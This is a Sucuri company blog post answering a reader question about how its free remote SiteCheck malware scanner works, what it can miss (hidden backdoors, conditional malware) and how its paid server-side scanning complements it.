Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Sounds simple, but being able to identify these issues remotely (without server access) is a very complicated task, and that’s why we do not guarantee 100% accuracy. If you see the “All clear” (green) result, it just means that when we scanned we couldn’t see anything malicious.

Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed.

How SiteCheck works

SiteCheck is a remote scanner, it visits your site like an everyday user or search engine bot would, and verifies if any of the pages have malicious code. In its simplest form, it does the following:

  1. We visit the main page and extract the list of links, javascript files and iframes
  2. We re-visit the main page acting as a search engine bot
  3. From the links we extract, we select 8-10 of them and visit them using different referrers and user agents.
  4. We extract and scan all javascript files and iframes present.
  5. We run all those pages/links against our large malware database and perform multiple anomaly checks, comparing results between different user agents/referrers to see if there is anything hidden.
  6. We also check all the included resources against multiple blacklists to see if there is anything being flagged by others or that we identified on other compromised sites.

As you can see, we only have access to what is visible on the browser. If you have a hidden backdoor inside your wp-content/uploads, or a core file that doesn’t render content on the browser, it won’t detect anything malicious. This means it might not detect the following:

  • Phishing pages that are only known to the attacker but have no direct links
  • Hidden links or spam injection that we can’t attest that it was inserted by an attacker

There is also one other very important condition that could impact the scanners detection – conditional malware. We have written about this several times, there are many new sophisticated strands of malware that apply rules to every visit by a user. Those rules will dictate when something does, or does not display. Rules vary, some only display to Google IP’s, some display only once a day, or once per IP, or once a week, or under specific conditions on the clients local configuration.

Complementing SiteCheck

Because of some of these challenges, we introduced the server-side scanning for all paying clients (included in all our plans). This scanner will crawl all files in your website directory and work to identify hidden backdoors, phishing page, malware injections, spam and other conditional type infections. Both scanners compliment one another, each are designed to detect certain things and help verify what the other catches.

Another benefit of our server-side scanning is that it will generate an audit trail of any file changes, allowing us to see exactly when a compromise happened.

When you couple that with our manual audits (done by our support team and included in all our plans), you start building a very high level of detection confidence in all the sites we monitor.

Conclusion

We hope this clarifies how SiteCheck works, but if it doesn’t, ask more questions and we’ll be happy to respond. Another very important thing that all clients need to understand is that our remediation services are not restricted to what we do detect. If at any time you feel you may be compromised you are never more than one ticket away from us manually hunt it down and remove it for you.

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid